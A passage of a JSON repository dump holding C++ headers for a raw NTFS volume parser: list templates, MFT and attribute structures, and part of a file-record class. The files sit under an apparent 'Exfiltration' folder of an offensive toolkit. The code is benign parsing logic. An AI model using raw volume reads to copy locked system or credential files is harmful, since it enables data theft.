CFileRecord process it\ntypedef void (*ATTR_RAW_CALLBACK)(const ATTR_HEADER_COMMON *attrHead, BOOL *bDiscard);\n\n// User defined Callback routine to handle CFileRecord parsed attributes\n// Will be called by CFileRecord::TraverseAttrs() for each attribute\n// attrClass is the according attribute's wrapping class, CAttr_xxx\n// Set bStop to TRUE if don't want to continue\n// Set bStop to FALSE to continue processing\nclass CAttrBase;\ntypedef void (*ATTRS_CALLBACK)(const CAttrBase *attr, void *context, BOOL *bStop);\n\n// User defined Callback routine to handle Directory traversing\n// Will be called by CFileRecord::TraverseSubEntries for each sub entry\nclass CIndexEntry;\ntypedef void (*SUBENTRY_CALLBACK)(const CIndexEntry *ie);\n\n\n// List Entry\ntemplate <class ENTRY_TYPE>\nstruct NTSLIST_ENTRY\n{\n\tNTSLIST_ENTRY\t*Next;\n\tENTRY_TYPE\t\t*Entry;\n};\n\n// List Entry Smart Pointer\ntemplate <class ENTRY_TYPE>\nclass CEntrySmartPtr\n{\npublic:\n\tCEntrySmartPtr(ENTRY_TYPE *ptr = NULL)\n\t{\n\t\tEntryPtr = ptr;\n\t}\n\n\tvirtual ~CEntrySmartPtr()\n\t{\n\t\tif (EntryPtr)\n\t\t\tdelete EntryPtr;\n\t}\n\nprivate:\n\tconst ENTRY_TYPE *EntryPtr;\n\npublic:\n\t__inline CEntrySmartPtr<ENTRY_TYPE> operator = (const ENTRY_TYPE* ptr)\n\t{\n\t\t// Delete previous pointer if allocated\n\t\tif (EntryPtr)\n\t\t\tdelete EntryPtr;\n\n\t\tEntryPtr = ptr;\n\n\t\treturn *this;\n\t}\n\n\t__inline const ENTRY_TYPE* operator->() const\n\t{\n\t\t_ASSERT(EntryPtr);\n\t\treturn EntryPtr;\n\t}\n\n\t__inline BOOL IsValid() const\n\t{\n\t\treturn EntryPtr != NULL;\n\t}\n};\n\n//////////////////////////////////////\n// Single list implementation\n//////////////////////////////////////\ntemplate <class ENTRY_TYPE>\nclass CSList\n{\npublic:\n\tCSList()\n\t{\n\t\tListHead = ListTail = NULL;\n\t\tListCurrent = NULL;\n\t\tEntryCount = 0;\n\t}\n\n\tvirtual ~CSList()\n\t{\n\t\tRemoveAll();\n\t}\n\nprivate:\n\tint EntryCount;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListHead;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListTail;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListCurrent;\n\npublic:\n\t// Get entry count\n\t__inline int GetCount() const\n\t{\n\t\treturn EntryCount;\n\t}\n\n\t// Insert to tail\n\tBOOL InsertEntry(ENTRY_TYPE *entry)\n\t{\n\t\tNTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;\n\t\tif (!le)\n\t\t\treturn FALSE;\n\n\t\tle->Entry = entry;\n\t\tle->Next = NULL;\n\n\t\tif (ListTail == NULL)\n\t\t\tListHead = le;\t\t// Empty list\n\t\telse\n\t\t\tListTail->Next = le;\n\n\t\tListTail = le;\n\n\t\tEntryCount++;\n\t\treturn TRUE;\n\t}\n\n\t// Remove all entries\n\tvoid RemoveAll()\n\t{\n\t\twhile (ListHead)\n\t\t{\n\t\t\tListCurrent = ListHead->Next;\n\t\t\tdelete ListHead->Entry;\n\t\t\tdelete ListHead;\n\n\t\t\tListHead = ListCurrent;\n\t\t}\n\n\t\tListHead = ListTail = NULL;\n\t\tListCurrent = NULL;\n\t\tEntryCount = 0;\n\t}\n\n\t// Find first entry\n\t__inline ENTRY_TYPE *FindFirstEntry() const\n\t{\n\t\t((CSList<ENTRY_TYPE>*)this)->ListCurrent = ListHead;\n\n\t\tif (ListCurrent)\n\t\t\treturn ListCurrent->Entry;\n\t\telse\n\t\t\treturn NULL;\n\t}\n\n\t// Find next entry\n\t__inline ENTRY_TYPE *FindNextEntry() const\n\t{\n\t\tif (ListCurrent)\n\t\t\t((CSList<ENTRY_TYPE>*)this)->ListCurrent = ListCurrent->Next;\n\n\t\tif (ListCurrent)\n\t\t\treturn ListCurrent->Entry;\n\t\telse\n\t\t\treturn NULL;\n\t}\n\n\t// Throw all entries\n\t// Caution! All entries are just thrown without free\n\t__inline void ThrowAll()\n\t{\n\t\tListHead = ListTail = NULL;\n\t\tListCurrent = NULL;\n\t\tEntryCount = 0;\n\t}\n};\t//CSList\n\n\n//////////////////////////////////////\n// Stack implementation\n//////////////////////////////////////\ntemplate <class ENTRY_TYPE>\nclass CStack\n{\npublic:\n\tCStack()\n\t{\n\t\tListHead = ListTail = NULL;\n\t\tEntryCount = 0;\n\t}\n\n\tvirtual ~CStack()\n\t{\n\t\tRemoveAll();\n\t}\n\nprivate:\n\tint EntryCount;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListHead;\n\tNTSLIST_ENTRY<ENTRY_TYPE> *ListTail;\n\npublic:\n\t// Get entry count\n\t__inline int GetCount() const\n\t{\n\t\treturn EntryCount;\n\t}\n\n\t// Insert to head\n\tBOOL Push(ENTRY_TYPE *entry)\n\t{\n\t\tNTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;\n\t\tif (!le)\n\t\t\treturn FALSE;\n\n\t\tle->Entry = entry;\n\t\tle->Next = ListHead;\n\n\t\tListHead = le;\n\n\t\tif (ListTail == NULL)\n\t\t\tListTail = le;\t\t// Empty list\n\n\t\tEntryCount ++;\n\t\treturn TRUE;\n\t}\n\n\t// Remove from head\n\tENTRY_TYPE* Pop()\n\t{\n\t\tif (ListHead == NULL)\n\t\t\treturn NULL;\n\n\t\tNTSLIST_ENTRY<ENTRY_TYPE> *le = ListHead;\n\t\tENTRY_TYPE *e = le->Entry;\n\n\t\tif (ListTail == ListHead)\n\t\t\tListTail = ListHead->Next;\n\t\tListHead = ListHead->Next;\n\n\t\tdelete le;\n\t\tEntryCount --;\n\n\t\treturn e;\n\t}\n\n\t// Remove all entries\n\tvoid RemoveAll()\n\t{\n\t\tNTSLIST_ENTRY<ENTRY_TYPE> *le;\n\n\t\twhile (ListHead)\n\t\t{\n\t\t\tle = ListHead->Next;\n\t\t\tdelete ListHead->Entry;\n\t\t\tdelete ListHead;\n\n\t\t\tListHead = le;\n\t\t}\n\n\t\tListHead = ListTail = NULL;\n\t\tEntryCount = 0;\n\t}\n};\t//CStack\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/NTFS_DataType.h",
    "content": "/*\n * NTFS data structures and definitions\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef\t__NTFS_DATATYPE_H_CYB70289\n#define\t__NTFS_DATATYPE_H_CYB70289\n\n// NTFS Boot Sector BPB\n\n#define\tNTFS_SIGNATURE\t\t\"NTFS    \"\n\n#pragma pack(1)\ntypedef struct tagNTFS_BPB\n{\n\t// jump instruction\n\tBYTE\t\tJmp[3];\n\n\t// signature\n\tBYTE\t\tSignature[8];\n\n\t// BPB and extended BPB\n\tWORD\t\tBytesPerSector;\n\tBYTE\t\tSectorsPerCluster;\n\tWORD\t\tReservedSectors;\n\tBYTE\t\tZeros1[3];\n\tWORD\t\tNotUsed1;\n\tBYTE\t\tMediaDescriptor;\n\tWORD\t\tZeros2;\n\tWORD\t\tSectorsPerTrack;\n\tWORD\t\tNumberOfHeads;\n\tDWORD\t\tHiddenSectors;\n\tDWORD\t\tNotUsed2;\n\tDWORD\t\tNotUsed3;\n\tULONGLONG\tTotalSectors;\n\tULONGLONG\tLCN_MFT;\n\tULONGLONG\tLCN_MFTMirr;\n\tDWORD\t\tClustersPerFileRecord;\n\tDWORD\t\tClustersPerIndexBlock;\n\tBYTE\t\tVolumeSN[8];\n\n\t// boot code\n\tBYTE\t\tCode[430];\n\n\t//0xAA55\n\tBYTE\t\t_AA;\n\tBYTE\t\t_55;\n} NTFS_BPB;\n#pragma pack()\n\n\n// MFT Indexes\n#define\tMFT_IDX_MFT\t\t\t\t0\n#define\tMFT_IDX_MFT_MIRR\t\t1\n#define\tMFT_IDX_LOG_FILE\t\t2\n#define\tMFT_IDX_VOLUME\t\t\t3\n#define\tMFT_IDX_ATTR_DEF\t\t4\n#define\tMFT_IDX_ROOT\t\t\t5\n#define\tMFT_IDX_BITMAP\t\t\t6\n#define\tMFT_IDX_BOOT\t\t\t7\n#define\tMFT_IDX_BAD_CLUSTER\t\t8\n#define\tMFT_IDX_SECURE\t\t\t9\n#define\tMFT_IDX_UPCASE\t\t\t10\n#define\tMFT_IDX_EXTEND\t\t\t11\n#define\tMFT_IDX_RESERVED12\t\t12\n#define\tMFT_IDX_RESERVED13\t\t13\n#define\tMFT_IDX_RESERVED14\t\t14\n#define\tMFT_IDX_RESERVED15\t\t15\n#define\tMFT_IDX_USER\t\t\t16\n\n\n/******************************\n\t\tFile Record\n\t---------------------\n\t| File Record Header|\n\t---------------------\n\t|    Attribute 1    |\n\t---------------------\n\t|    Attribute 2    |\n\t---------------------\n\t|      ......       |\n\t---------------------\n\t|     0xFFFFFFFF    |\n\t---------------------\n*******************************/\n\n// File Record Header\n\n#define\tFILE_RECORD_MAGIC\t\t'ELIF'\n#define\tFILE_RECORD_FLAG_INUSE\t0x01\t// File record is in use\n#define\tFILE_RECORD_FLAG_DIR\t0x02\t// File record is a directory\n\ntypedef struct tagFILE_RECORD_HEADER\n{\n\tDWORD\t\tMagic;\t\t\t// \"FILE\"\n\tWORD\t\tOffsetOfUS;\t\t// Offset of Update Sequence\n\tWORD\t\tSizeOfUS;\t\t// Size in words of Update Sequence Number & Array\n\tULONGLONG\tLSN;\t\t\t// $LogFile Sequence Number\n\tWORD\t\tSeqNo;\t\t\t// Sequence number\n\tWORD\t\tHardlinks;\t\t// Hard link count\n\tWORD\t\tOffsetOfAttr;\t// Offset of the first Attribute\n\tWORD\t\tFlags;\t\t\t// Flags\n\tDWORD\t\tRealSize;\t\t// Real size of the FILE record\n\tDWORD\t\tAllocSize;\t\t// Allocated size of the FILE record\n\tULONGLONG\tRefToBase;\t\t// File reference to the base FILE record\n\tWORD\t\tNextAttrId;\t\t// Next Attribute Id\n\tWORD\t\tAlign;\t\t\t// Align to 4 byte boundary\n\tDWORD\t\tRecordNo;\t\t// Number of this MFT Record\n} FILE_RECORD_HEADER;\n\n\n/******************************\n\t\tAttribute\n\t--------------------\n\t| Attribute Header |\n\t--------------------\n\t|  Attribute Data  |\n\t--------------------\n*******************************/\n\n// Attribute Header\n\n#define\tATTR_TYPE_STANDARD_INFORMATION\t0x10\n#define\tATTR_TYPE_ATTRIBUTE_LIST\t\t0x20\n#define\tATTR_TYPE_FILE_NAME\t\t\t\t0x30\n#define\tATTR_TYPE_OBJECT_ID\t\t\t\t0x40\n#define\tATTR_TYPE_SECURITY_DESCRIPTOR\t0x50\n#define\tATTR_TYPE_VOLUME_NAME\t\t\t0x60\n#define\tATTR_TYPE_VOLUME_INFORMATION\t0x70\n#define\tATTR_TYPE_DATA\t\t\t\t\t0x80\n#define\tATTR_TYPE_INDEX_ROOT\t\t\t0x90\n#define\tATTR_TYPE_INDEX_ALLOCATION\t\t0xA0\n#define\tATTR_TYPE_BITMAP\t\t\t\t0xB0\n#define\tATTR_TYPE_REPARSE_POINT\t\t\t0xC0\n#define\tATTR_TYPE_EA_INFORMATION\t\t0xD0\n#define\tATTR_TYPE_EA\t\t\t\t\t0xE0\n#define\tATTR_TYPE_LOGGED_UTILITY_STREAM\t0x100\n\n#define\tATTR_FLAG_COMPRESSED\t\t\t0x0001\n#define\tATTR_FLAG_ENCRYPTED\t\t\t\t0x4000\n#define\tATTR_FLAG_SPARSE\t\t\t\t0x8000\n\ntypedef\tstruct tagATTR_HEADER_COMMON\n{\n\tDWORD\t\tType;\t\t\t// Attribute Type\n\tDWORD\t\tTotalSize;\t\t// Length (including this header)\n\tBYTE\t\tNonResident;\t// 0 - resident, 1 - non resident\n\tBYTE\t\tNameLength;\t\t// name length in words\n\tWORD\t\tNameOffset;\t\t// offset to the name\n\tWORD\t\tFlags;\t\t\t// Flags\n\tWORD\t\tId;\t\t\t\t// Attribute Id\n} ATTR_HEADER_COMMON;\n\ntypedef\tstruct tagATTR_HEADER_RESIDENT\n{\n\tATTR_HEADER_COMMON\tHeader;\t\t\t// Common data structure\n\tDWORD\t\t\t\tAttrSize;\t\t// Length of the attribute body\n\tWORD\t\t\t\tAttrOffset;\t\t// Offset to the Attribute\n\tBYTE\t\t\t\tIndexedFlag;\t// Indexed flag\n\tBYTE\t\t\t\tPadding;\t\t// Padding\n} ATTR_HEADER_RESIDENT;\n\ntypedef struct tagATTR_HEADER_NON_RESIDENT\n{\n\tATTR_HEADER_COMMON\tHeader;\t\t\t// Common data structure\n\tULONGLONG\t\t\tStartVCN;\t\t// Starting VCN\n\tULONGLONG\t\t\tLastVCN;\t\t// Last VCN\n\tWORD\t\t\t\tDataRunOffset;\t// Offset to the Data Runs\n\tWORD\t\t\t\tCompUnitSize;\t// Compression unit size\n\tDWORD\t\t\t\tPadding;\t\t// Padding\n\tULONGLONG\t\t\tAllocSize;\t\t// Allocated size of the attribute\n\tULONGLONG\t\t\tRealSize;\t\t// Real size of the attribute\n\tULONGLONG\t\t\tIniSize;\t\t// Initialized data size of the stream \n} ATTR_HEADER_NON_RESIDENT;\n\n\n// Attribute: STANDARD_INFORMATION\n\n#define\tATTR_STDINFO_PERMISSION_READONLY\t0x00000001\n#define\tATTR_STDINFO_PERMISSION_HIDDEN\t\t0x00000002\n#define\tATTR_STDINFO_PERMISSION_SYSTEM\t\t0x00000004\n#define\tATTR_STDINFO_PERMISSION_ARCHIVE\t\t0x00000020\n#define\tATTR_STDINFO_PERMISSION_DEVICE\t\t0x00000040\n#define\tATTR_STDINFO_PERMISSION_NORMAL\t\t0x00000080\n#define\tATTR_STDINFO_PERMISSION_TEMP\t\t0x00000100\n#define\tATTR_STDINFO_PERMISSION_SPARSE\t\t0x00000200\n#define\tATTR_STDINFO_PERMISSION_REPARSE\t\t0x00000400\n#define\tATTR_STDINFO_PERMISSION_COMPRESSED\t0x00000800\n#define\tATTR_STDINFO_PERMISSION_OFFLINE\t\t0x00001000\n#define\tATTR_STDINFO_PERMISSION_NCI\t\t\t0x00002000\n#define\tATTR_STDINFO_PERMISSION_ENCRYPTED\t0x00004000\n\ntypedef struct tagATTR_STANDARD_INFORMATION\n{\n\tULONGLONG\tCreateTime;\t\t// File creation time\n\tULONGLONG\tAlterTime;\t\t// File altered time\n\tULONGLONG\tMFTTime;\t\t// MFT changed time\n\tULONGLONG\tReadTime;\t\t// File read time\n\tDWORD\t\tPermission;\t\t// Dos file permission\n\tDWORD\t\tMaxVersionNo;\t// Maxim number of file versions\n\tDWORD\t\tVersionNo;\t\t// File version number\n\tDWORD\t\tClassId;\t\t// Class Id\n\tDWORD\t\tOwnerId;\t\t// Owner Id\n\tDWORD\t\tSecurityId;\t\t// Security Id\n\tULONGLONG\tQuotaCharged;\t// Quota charged\n\tULONGLONG\tUSN;\t\t\t// USN Journel\n} ATTR_STANDARD_INFORMATION;\n\n\n// Attribute: ATTRIBUTE_LIST\n\ntypedef struct tagATTR_ATTRIBUTE_LIST\n{\n\tDWORD\t\tAttrType;\t\t// Attribute type\n\tWORD\t\tRecordSize;\t\t// Record length\n\tBYTE\t\tNameLength;\t\t// Name length in characters\n\tBYTE\t\tNameOffset;\t\t// Name offset\n\tULONGLONG\tStartVCN;\t\t// Start VCN\n\tULONGLONG\tBaseRef;\t\t// Base file reference to the attribute\n\tWORD\t\tAttrId;\t\t\t// Attribute Id\n} ATTR_ATTRIBUTE_LIST;\n\n// Attribute: FILE_NAME\n\n#define\tATTR_FILENAME_FLAG_READONLY\t\t0x00000001\n#define\tATTR_FILENAME_FLAG_HIDDEN\t\t0x00000002\n#define\tATTR_FILENAME_FLAG_SYSTEM\t\t0x00000004\n#define\tATTR_FILENAME_FLAG_ARCHIVE\t\t0x00000020\n#define\tATTR_FILENAME_FLAG_DEVICE\t\t0x00000040\n#define\tATTR_FILENAME_FLAG_NORMAL\t\t0x00000080\n#define\tATTR_FILENAME_FLAG_TEMP\t\t\t0x00000100\n#define\tATTR_FILENAME_FLAG_SPARSE\t\t0x00000200\n#define\tATTR_FILENAME_FLAG_REPARSE\t\t0x00000400\n#define\tATTR_FILENAME_FLAG_COMPRESSED\t0x00000800\n#define\tATTR_FILENAME_FLAG_OFFLINE\t\t0x00001000\n#define\tATTR_FILENAME_FLAG_NCI\t\t\t0x00002000\n#define\tATTR_FILENAME_FLAG_ENCRYPTED\t0x00004000\n#define\tATTR_FILENAME_FLAG_DIRECTORY\t0x10000000\n#define\tATTR_FILENAME_FLAG_INDEXVIEW\t0x20000000\n\n#define\tATTR_FILENAME_NAMESPACE_POSIX\t0x00\n#define\tATTR_FILENAME_NAMESPACE_WIN32\t0x01\n#define\tATTR_FILENAME_NAMESPACE_DOS\t\t0x02\n\ntypedef struct tagATTR_FILE_NAME\n{\n\tULONGLONG\tParentRef;\t\t// File reference to the parent directory\n\tULONGLONG\tCreateTime;\t\t// File creation time\n\tULONGLONG\tAlterTime;\t\t// File altered time\n\tULONGLONG\tMFTTime;\t\t// MFT changed time\n\tULONGLONG\tReadTime;\t\t// File read time\n\tULONGLONG\tAllocSize;\t\t// Allocated size of the file\n\tULONGLONG\tRealSize;\t\t// Real size of the file\n\tDWORD\t\tFlags;\t\t\t// Flags\n\tDWORD\t\tER;\t\t\t\t// Used by EAs and Reparse\n\tBYTE\t\tNameLength;\t\t// Filename length in characters\n\tBYTE\t\tNameSpace;\t\t// Filename space\n\tWORD\t\tName[1];\t\t// Filename\n} ATTR_FILE_NAME;\n\n\n// Attribute: VOLUME_INFORMATION\n\n#define\tATTR_VOLINFO_FLAG_DIRTY\t\t0x0001\t// Dirty\n#define\tATTR_VOLINFO_FLAG_RLF\t\t0x0002\t// Resize logfile\n#define\tATTR_VOLINFO_FLAG_UOM\t\t0x0004\t// Upgrade on mount\n#define\tATTR_VOLINFO_FLAG_MONT\t\t0x0008\t// Mounted on NT4\n#define\tATTR_VOLINFO_FLAG_DUSN\t\t0x0010\t// Delete USN underway\n#define\tATTR_VOLINFO_FLAG_ROI\t\t0x0020\t// Repair object Ids\n#define\tATTR_VOLINFO_FLAG_MBC\t\t0x8000\t// Modified by chkdsk\n\ntypedef struct tagATTR_VOLUME_INFORMATION\n{\n\tBYTE\tReserved1[8];\t// Always 0 ?\n\tBYTE\tMajorVersion;\t// Major version\n\tBYTE\tMinorVersion;\t// Minor version\n\tWORD\tFlags;\t\t\t// Flags\n\tBYTE\tReserved2[4];\t// Always 0 ?\n} ATTR_VOLUME_INFORMATION;\n\n\n// Attribute: INDEX_ROOT\n/******************************\n\t\tINDEX_ROOT\n\t---------------------\n\t| Index Root Header |\n\t---------------------\n\t|    Index Header   |\n\t---------------------\n\t|    Index Entry    |\n\t---------------------\n\t|    Index Entry    |\n\t---------------------\n\t|      ......       |\n\t---------------------\n*******************************/\n\n#define\tATTR_INDEXROOT_FLAG_SMALL\t0x00\t// Fits in Index Root File Record\n#define\tATTR_INDEXROOT_FLAG_LARGE\t0x01\t// Index Allocation and Bitmap needed\n\ntypedef struct tagATTR_INDEX_ROOT\n{\n\t// Index Root Header\n\tDWORD\t\tAttrType;\t\t\t// Attribute type (ATTR_TYPE_FILE_NAME: Directory, 0: Index View)\n\tDWORD\t\tCollRule;\t\t\t// Collation rule\n\tDWORD\t\tIBSize;\t\t\t\t// Size of index block\n\tBYTE\t\tClustersPerIB;\t\t// Clusters per index block (same as BPB?)\n\tBYTE\t\tPadding1[3];\t\t// Padding\n\t// Index Header\n\tDWORD\t\tEntryOffset;\t\t// Offset to the first index entry, relative to this address(0x10)\n\tDWORD\t\tTotalEntrySize;\t\t// Total size of the index entries\n\tDWORD\t\tAllocEntrySize;\t\t// Allocated size of the index entries\n\tBYTE\t\tFlags;\t\t\t\t// Flags\n\tBYTE\t\tPadding2[3];\t\t// Padding\n} ATTR_INDEX_ROOT;\n\n\n// INDEX ENTRY\n\n#define\tINDEX_ENTRY_FLAG_SUBNODE\t0x01\t// Index entry points to a sub-node\n#define\tINDEX_ENTRY_FLAG_LAST\t\t0x02\t// Last index entry in the node, no Stream\n\ntypedef struct tagINDEX_ENTRY\n{\n\tULONGLONG\tFileReference;\t// Low 6B: MFT record index, High 2B: MFT record sequence number\n\tWORD\t\tSize;\t\t\t// Length of the index entry\n\tWORD\t\tStreamSize;\t\t// Length of the stream\n\tBYTE\t\tFlags;\t\t\t// Flags\n\tBYTE\t\tPadding[3];\t\t// Padding\n\tBYTE\t\tStream[1];\t\t// Stream\n\t// VCN of the sub node in Index Allocation, Offset = Size - 8\n} INDEX_ENTRY;\n\n\n// INDEX BLOCK\n/******************************\n\t\t INDEX_BLOCK\n\t-----------------------\n\t|  Index Block Header |\n\t-----------------------\n\t|     Index Header    |\n\t-----------------------\n\t|     Index Entry     |\n\t-----------------------\n\t|     Index Entry     |\n\t-----------------------\n\t|       ......        |\n\t-----------------------\n*******************************/\n\n#define\tINDEX_BLOCK_MAGIC\t\t'XDNI'\n\ntypedef struct tagINDEX_BLOCK\n{\n\t// Index Block Header\n\tDWORD\t\tMagic;\t\t\t// \"INDX\"\n\tWORD\t\tOffsetOfUS;\t\t// Offset of Update Sequence\n\tWORD\t\tSizeOfUS;\t\t// Size in words of Update Sequence Number & Array\n\tULONGLONG\tLSN;\t\t\t// $LogFile Sequence Number\n\tULONGLONG\tVCN;\t\t\t// VCN of this index block in the index allocation\n\t// Index Header\n\tDWORD\t\tEntryOffset;\t// Offset of the index entries, relative to this address(0x18)\n\tDWORD\t\tTotalEntrySize;\t// Total size of the index entries\n\tDWORD\t\tAllocEntrySize;\t// Allocated size of index entries\n\tBYTE\t\tNotLeaf;\t\t// 1 if not leaf node (has children)\n\tBYTE\t\tPadding[3];\t\t// Padding\n} INDEX_BLOCK;\n\n#endif\n"
  },
  {
    "path": "Exfiltration/NTFSParser/NTFSParserDLL/NTFS_FileRecord.h",
    "content": "/*\n * NTFS Volume and File Record Class\n * \n * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>\n *\n * This program/include file is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as published\n * by the Free Software Foundation; either version 2 of the License, or\n * (at your option) any later version.\n *\n * This program/include file is distributed in the hope that it will be\n * useful, but WITHOUT ANY WARRANTY; without even the implied warranty\n * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n * GNU General Public License for more details.\n */\n\n#ifndef\t__NTFS_FILERECORD_H_CYB70289\n#define\t__NTFS_FILERECORD_H_CYB70289\n\n\n///////////////////////////////////////\n// NTFS Volume forward declaration\n///////////////////////////////////////\nclass CNTFSVolume\n{\npublic:\n\tCNTFSVolume(_TCHAR volume);\n\tvirtual ~CNTFSVolume();\n\n\tfriend class CFileRecord;\n\tfriend class CAttrBase;\n\nprivate:\n\tWORD SectorSize;\n\tDWORD ClusterSize;\n\tDWORD FileRecordSize;\n\tDWORD IndexBlockSize;\n\tULONGLONG MFTAddr;\n\tHANDLE hVolume;\n\tBOOL VolumeOK;\n\tATTR_RAW_CALLBACK AttrRawCallBack[ATTR_NUMS];\n\tWORD Version;\n\n\t// MFT file records ($MFT file itself) may be fragmented\n\t// Get $MFT Data attribute to translate FileRecord to correct disk offset\n\tCFileRecord *MFTRecord;\t\t// $MFT File Record\n\tconst CAttrBase *MFTData;\t// $MFT Data Attribute\n\n\tBOOL OpenVolume(_TCHAR volume);\n\npublic:\n\t__inline BOOL IsVolumeOK() const;\n\t__inline WORD GetVersion() const;\n\t__inline ULONGLONG GetRecordsCount() const;\n\n\t__inline DWORD GetSectorSize() const;\n\t__inline DWORD GetClusterSize() const;\n\t__inline DWORD GetFileRecordSize() const;\n\t__inline DWORD GetIndexBlockSize() const;\n\t__inline ULONGLONG GetMFTAddr() const;\n\n\tBOOL InstallAttrRawCB(DWORD attrType, ATTR_RAW_CALLBACK cb);\n\t__inline void ClearAttrRawCB();\n};\t// CNTFSVolume\n\n\n////////////////////////////////////////////\n// List to hold Attributes of the same type\n////////////////////////////////////////////\ntypedef class CSList<CAttrBase> CAttrList;\n\n// It seems VC6.0 doesn't support template class friends\n#if\t_MSC_VER <= 1200\nclass CAttrResident;\nclass CAttrNonResident;\ntemplate <class TYPE_RESIDENT> class CAttr_AttrList;\n#endif\n\n////////////////////////////////\n// Process a single File Record\n////////////////////////////////\nclass CFileRecord\n{\npublic:\n\tCFileRecord(const CNTFSVolume *volume);\n\tvirtual ~CFileRecord();\n\n\tfriend class CAttrBase;\n#if\t_MSC_VER <= 1200\n\t// Walk around VC6.0 compiler defect\n\tfriend class CAttr_AttrList<CAttrResident>;\n\tfriend class CAttr_AttrList<CAttrNonResident>;\n#else\n\ttemplate <class TYPE_RESIDENT> friend class CAttr_AttrList;\t\t// Won't compiler in VC6.0, why?\n#endif\n\nprivate:\n\tconst CNTFSVolume *Volume;\n\tFILE_RECORD_HEADER *FileRecord;\n\tULONGLONG FileReference;\n\tATTR_RAW_CALLBACK AttrRawCallBack[ATTR_NUMS];\n\tDWORD AttrMask;\n\tCAttrList AttrList[ATTR_NUMS];\t// Attributes\n\n\tvoid ClearAttrs();\n\tBOOL PatchUS(WORD *sector, int sectors, WORD usn, WORD *usarray);\n\t__inline void UserCallBack(DWORD attType, ATTR_HEADER_COMMON *ahc, BOOL *bDiscard);\n\tCAttrBase* AllocAttr(ATTR_HEADER_COMMON *ahc, BOOL *bUnhandled);\n\tBOOL ParseAttr(ATTR_HEADER_COMMON *ahc);\n\tFILE_RECORD_HEADER* ReadFileRecord(ULONGLONG &fileRef);\n\tBOOL VisitIndexBlock(const ULONGLONG &vcn, const _TCHAR *fileName, CIndexEntry &ieFound) const;\n\tvoid TraverseSubNode(const ULONGLONG &vcn, SUBENTRY_CALLBACK seCallBack) const;\n\npublic:\n\tBOOL ParseFileRecord(ULONGLONG fileRef);\n\tBOOL ParseAttrs();\n\n\tBOOL InstallAttrRawCB(DWORD attrType, ATTR_RAW_CALLBACK cb);\n\t__inline void ClearAttrRawCB();\n\n\t__inline void SetAttrMask(DWORD mask);\n\tvoid TraverseAttrs(ATTRS_CALLBACK attrCallBack, void *context);\n\t__inline const CAttrBase* FindFirstAttr(DWORD attrType) const;\n\tconst CAttrBase* FindNextAttr(DWORD attrType) const;\n\n\tint GetFileName(_TCHAR *buf, DWORD bufLen) const;\n\t__inline ULONGLONG GetFileSize() const;\n\tvoid GetFileTime(FILETIME *writeTm, FILETIME *createTm = NULL, FILETIME *accessTm = NULL) const;\n\n\tvoid TraverseSubEntries(SUBENTRY_CALLBACK seCallBack) const;\n\t__inline const BOOL FindSubEntry(const _TCHAR *fileName, CIndexEntry &ieFound) const;\n\tconst CAttrBase* FindStream(_TCHAR *name = NULL);\n\n\t__inline BOOL IsDeleted() const;\n\t__inline BOOL IsDirectory() const;\n\t__inline BOOL IsReadOnly() const;\n\t__inline BOOL IsHidden() const;\n\t__inline BOOL IsSystem() const;\n\t__inline BOOL IsCompressed() const;\n\t__inline BOOL IsEncrypted() const;\n\t__inline BOOL IsSparse() const;\n};\t// CFileRecord\n\n\n#include \"NTFS_Attribute.h\"\n\n\nCFileRecord::CFileRecord(const CNTFSVolume *volume)\n{\n\t_ASSERT(volume);\n\tVolume = volume;\n\tFileRecord = NULL;\n\tFileReference = (ULONGLONG)-1;\n\n\tClearAttrRawCB();\n\n\t// Default to parse all attributes\n\tAttrMask = MASK_ALL;\n}\n\nCFileRecord::~CFileRecord()\n{\n\tClearAttrs();\n\n\tif (FileRecord)\n\t\tdelete FileRecord;\n}\n\n// Free all CAttr_xxx\nvoid CFileRecord::ClearAttrs()\n{\n\tfor (int i=0; i<ATTR_NUMS; i++)\n\t{\n\t\tAttrList[i].RemoveAll();\n\t}\n}\n\n// Verify US and update sectors\nBOOL CFileRecord::PatchUS(WORD *sector, int sectors, WORD usn, WORD *usarray)\n{\n\tint i;\n\n\tfor (i=0; i<sectors; i++)\n\t{\n\t\tsector += ((Volume->SectorSize>>1) - 1);\n\t\tif (*sector != usn)\n\t\t\treturn FALSE;\t// USN error\n\t\t*sector = usarray[i];\t// Write back correct data\n\t\tsector++;\n\t}\n\treturn TRUE;\n}\n\n// Call user defined Callback routines for an attribute\n__inline void CFileRecord::UserCallBack(DWORD attType, ATTR_HEADER_COMMON *ahc, BOOL *bDiscard)\n{\n\t*bDiscard = FALSE;\n\n\tif (AttrRawCallBack[attType])\n\t\tAttrRawCallBack[attType](ahc, bDiscard);\n\telse if (Volume->AttrRawCallBack[attType])\n\t\tVolume->AttrRawCallBack[attType](ahc, bDiscard);\n}\n\nCAttrBase* CFileRecord::AllocAttr(ATTR_HEADER_COMMON *ahc, BOOL *bUnhandled)\n{\n\tswitch (ahc->Type)\n\t{\n\t\tcase ATTR_TYPE_STANDARD_INFORMATION:\n\t\t\treturn new CAttr_StdInfo(ahc, this);\n\n\t\tcase ATTR_TYPE_ATTRIBUTE_LIST:\n\t\t\tif (ahc->NonResident)\n\t\t\t\treturn new CAttr_AttrList<CAttrNonResident>(ahc, this);\n\t\t\telse\n\t\t\t\treturn new CAttr_AttrList<CAttrResident>(ahc, this);\n\n\t\tcase ATTR_TYPE_FILE_NAME:\n\t\t\treturn new CAttr_FileName(ahc, this);\n\n\t\tcase 